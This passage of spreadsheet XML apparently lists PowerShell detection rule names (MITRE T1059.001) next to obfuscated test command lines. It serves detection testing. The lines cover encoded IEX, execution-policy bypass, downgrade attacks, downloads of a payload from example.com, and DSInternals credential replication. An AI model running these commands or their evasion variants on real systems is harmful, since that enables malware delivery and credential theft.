      <c r="K4466" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4467" ht="15.75" customHeight="1" s="42">
      <c r="A4467" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4467" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C4467" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D4467" s="43" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E4467" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F4467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4467" s="43" t="n"/>
      <c r="J4467" s="43" t="n"/>
      <c r="K4467" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4468" ht="15.75" customHeight="1" s="42">
      <c r="A4468" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4468" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C4468" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D4468" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E4468" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F4468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4468" s="43" t="n"/>
      <c r="J4468" s="43" t="n"/>
      <c r="K4468" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4469" ht="15.75" customHeight="1" s="42">
      <c r="A4469" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4469" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4469" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4469" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4469" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F4469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4469" s="43" t="n"/>
      <c r="J4469" s="43" t="n"/>
      <c r="K4469" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4470" ht="15.75" customHeight="1" s="42">
      <c r="A4470" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4470" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4470" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4470" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4470" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4470" s="43" t="n"/>
      <c r="J4470" s="43" t="n"/>
      <c r="K4470" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4471" ht="15.75" customHeight="1" s="42">
      <c r="A4471" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4471" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C4471" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D4471" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E4471" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCUTIonPolICy Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4471" s="43" t="n"/>
      <c r="J4471" s="43" t="n"/>
      <c r="K4471" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4472" ht="15.75" customHeight="1" s="42">
      <c r="A4472" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4472" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C4472" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D4472" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E4472" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4472" s="43" t="n"/>
      <c r="J4472" s="43" t="n"/>
      <c r="K4472" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4473" ht="15.75" customHeight="1" s="42">
      <c r="A4473" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4473" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C4473" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D4473" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E4473" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4473" s="43" t="n"/>
      <c r="J4473" s="43" t="n"/>
      <c r="K4473" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4474" ht="15.75" customHeight="1" s="42">
      <c r="A4474" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4474" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C4474" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D4474" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E4474" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4474" s="43" t="n"/>
      <c r="J4474" s="43" t="n"/>
      <c r="K4474" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4475" ht="15.75" customHeight="1" s="42">
      <c r="A4475" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4475" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C4475" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D4475" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E4475" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F4475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4475" s="43" t="n"/>
      <c r="J4475" s="43" t="n"/>
      <c r="K4475" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4476" ht="15.75" customHeight="1" s="42">
      <c r="A4476" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4476" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4476" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4476" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4476" s="43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476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4476" s="43" t="n"/>
      <c r="J4476" s="43" t="n"/>
      <c r="K4476" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4477" ht="15.75" customHeight="1" s="42">
      <c r="A4477" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4477" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4477" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4477" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4477" s="43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477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4477" s="43" t="n"/>
      <c r="J4477" s="43" t="n"/>
      <c r="K4477" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4478" ht="15.75" customHeight="1" s="42">
      <c r="A4478" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4478" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4478" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4478" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4478" s="43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4478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4478" s="43" t="n"/>
      <c r="J4478" s="43" t="n"/>
      <c r="K4478" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4479" ht="15.75" customHeight="1" s="42">
      <c r="A4479" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4479" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C4479" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D4479" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E4479" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -"Command" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F4479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4479" s="43" t="n"/>
      <c r="J4479" s="43" t="n"/>
      <c r="K4479" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4480" ht="15.75" customHeight="1" s="42">
      <c r="A4480" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4480" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C4480" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D4480" s="43" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E4480" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F4480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4480" s="43" t="n"/>
      <c r="J4480" s="43" t="n"/>
      <c r="K4480" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4481" ht="15.75" customHeight="1" s="42">
      <c r="A4481" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4481" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C4481" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D4481" s="43" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E4481" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F4481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4481" s="43" t="n"/>
      <c r="J4481" s="43" t="n"/>
      <c r="K4481" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4482" ht="15.75" customHeight="1" s="42">
      <c r="A4482" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4482" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C4482" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D4482" s="43" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E4482" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F4482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4482" s="43" t="n"/>
      <c r="J4482" s="43" t="n"/>
      <c r="K4482" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4483" ht="15.75" customHeight="1" s="42">
      <c r="A4483" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4483" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C4483" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D4483" s="43" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E4483" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F4483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4483" s="43" t="n"/>
      <c r="J4483" s="43" t="n"/>
      <c r="K4483" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4484" ht="15.75" customHeight="1" s="42">
      <c r="A4484" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C4484" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D4484" s="43" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E4484" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -c "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F4484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4484" s="43" t="n"/>
      <c r="J4484" s="43" t="n"/>
      <c r="K4484" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4485" ht="15.75" customHeight="1" s="42">
      <c r="A4485" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4485" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C4485" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D4485" s="43" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E4485" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F4485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4485" s="43" t="n"/>
      <c r="J4485" s="43" t="n"/>
      <c r="K4485" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4486" ht="15.75" customHeight="1" s="42">
      <c r="A4486" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4486" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C4486" s="43" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D4486" s="43" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E4486" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {&amp; 'Get-ADReplAccount' -All -Server $ENV:logonserver.TrimStart(""")}</t>
        </is>
      </c>
      <c r="F4486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4486" s="43" t="n"/>
      <c r="J4486" s="43" t="n"/>
      <c r="K4486" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4487" ht="15.75" customHeight="1" s="42">
      <c r="A4487" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4487" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C4487" s="43" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D4487" s="43" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E4487" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Invoke-Expression ('Get-' + 'ADReplAccount -All -Server $ENV:logonserver.TrimStart(""")')}</t>
        </is>
      </c>
      <c r="F4487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4487" s="43" t="n"/>
      <c r="J4487" s="43" t="n"/>
      <c r="K4487" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4488" ht="15.75" customHeight="1" s="42">
      <c r="A4488" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4488" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C4488" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D4488" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E4488" s="43" t="inlineStr">
        <is>
          <t>powershell.exe "-en"c JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F4488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4488" s="43" t="n"/>
      <c r="J4488" s="43" t="n"/>
      <c r="K4488" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4489" ht="15.75" customHeight="1" s="42">
      <c r="A4489" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4489" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C4489" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D4489" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E4489" s="43" t="inlineStr">
        <is>
          <t>powershell.exe "-en" c JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F4489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4489" s="43" t="n"/>
      <c r="J4489" s="43" t="n"/>
      <c r="K4489" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4490" ht="15.75" customHeight="1" s="42">
      <c r="A4490" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4490" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C4490" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D4490" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E4490" s="43" t="inlineStr">
        <is>
          <t>powershell.exe "-en"" c JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F4490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4490" s="43" t="n"/>
      <c r="J4490" s="43" t="n"/>
      <c r="K4490" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4491" ht="15.75" customHeight="1" s="42">
      <c r="A4491" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4491" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C4491" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D4491" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E4491" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"enc" JABoAG8AcwB0AG4AYQBtAGUA -EnCoding Unicode</t>
        </is>
      </c>
      <c r="F4491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4491" s="43" t="n"/>
      <c r="J4491" s="43" t="n"/>
      <c r="K4491" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4492" ht="15.75" customHeight="1" s="42">
      <c r="A4492" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4492" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C4492" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D4492" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E4492" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"enc" JABoAG8AcwB0AG4AYQBtAGUA -"Encoding" Unicode</t>
        </is>
      </c>
      <c r="F4492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4492" s="43" t="n"/>
      <c r="J4492" s="43" t="n"/>
      <c r="K4492" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4493" ht="15.75" customHeight="1" s="42">
      <c r="A4493" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4493" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C4493" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D4493" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E4493" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"e" JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F4493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4493" s="43" t="n"/>
      <c r="J4493" s="43" t="n"/>
      <c r="K4493" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4494" ht="15.75" customHeight="1" s="42">
      <c r="A4494" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4494" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C4494" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D4494" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E4494" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"e" JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F4494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4494" s="43" t="n"/>
      <c r="J4494" s="43" t="n"/>
      <c r="K4494" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4495" ht="15.75" customHeight="1" s="42">
